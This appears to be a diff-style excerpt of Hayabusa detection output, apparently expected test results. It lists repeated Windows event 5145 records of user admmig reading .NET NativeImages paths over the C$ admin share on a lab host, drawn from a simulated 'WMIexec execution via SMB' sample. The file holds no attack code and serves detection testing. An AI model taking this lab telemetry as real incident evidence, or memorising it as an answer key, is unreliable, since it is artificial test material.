+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
